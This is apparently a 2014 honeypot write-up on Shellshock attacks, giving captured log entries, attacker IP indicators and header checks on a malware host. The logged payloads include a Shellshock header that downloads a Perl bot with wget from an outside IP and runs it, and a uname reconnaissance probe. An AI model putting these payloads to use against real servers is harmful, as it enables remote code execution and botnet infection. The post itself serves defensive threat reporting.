by  Marirs

ShellShock Part 2

I know, sometimes things gets us obssesed, until its done and finished. Today after monitoring the logs, I was able to track down yet another 2 unique alerts from my Honey pot today.

[[email protected]]# tail /var/log/nginx/access.log
29-09-2014 07:43:08,67.227.0.73,() { :;}; /bin/bash -c "wget -P /var/tmp 174.143.240.43/…/x  perl /var/tmp/x",
29-09-2014 09:30:11,54.251.83.67,() { :;}; /bin/bash -c "echo testing9123123"; /bin/uname -a,

The second alert sounds interesting wherein the IP (54.251.83.67) belongs to Amazon Web Services in Singapore. This IP is possibly compromised (I leave that part to amazon who has to confirm) or is being used for Malicious activity. Though Virus total has no significant results yet, there was 1 malicious activity that has been identified.

VT Link

We have noticed that this particular IP is scanning most of the Organisations, Companies and private/personal blogs to see if there are any vulnerabilities. Be on alert to see this IP (54.251.83.67) if it hits your Network. Block them immediately.

Next, lets talk about the first one.

IP 174.143.240.43 belongs to RackSpace hosting. It uses a directory traversal method to pick up base64 encoded perl file and execute it in the vulnerable machine. The perl file is a Perl Bot.

[[email protected]]# curl -I http://174.143.240.43/…/x
HTTP/1.1 200 OK
Date: Mon, 29 Sep 2014 06:15:28 GMT
Server: Apache/2.2.9 (Debian)
Last-Modified: Sat, 27 Sep 2014 21:46:13 GMT
ETag: “340b1a-1b4dc-50412f6609340”
Accept-Ranges: bytes
Content-Length: 111836
Content-Type: text/plain
[[email protected]]# curl -I http://174.143.240.43/
HTTP/1.1 200 OK
Date: Mon, 29 Sep 2014 06:15:33 GMT
Server: Apache/2.2.9 (Debian)
Last-Modified: Tue, 06 Jul 2010 13:09:57 GMT
ETag: “33991a-2d-48ab7c5155340”
Accept-Ranges: bytes
Content-Length: 45
Vary: Accept-Encoding
Content-Type: text/html

VT Results

New Indicators:

  • 54.251.83.67
  • 174.143.240.43

Block these @ bay. Most of the Firewalls are already doing so. However, it will be interesting to see if there are any internal network communications happening to these IP’s.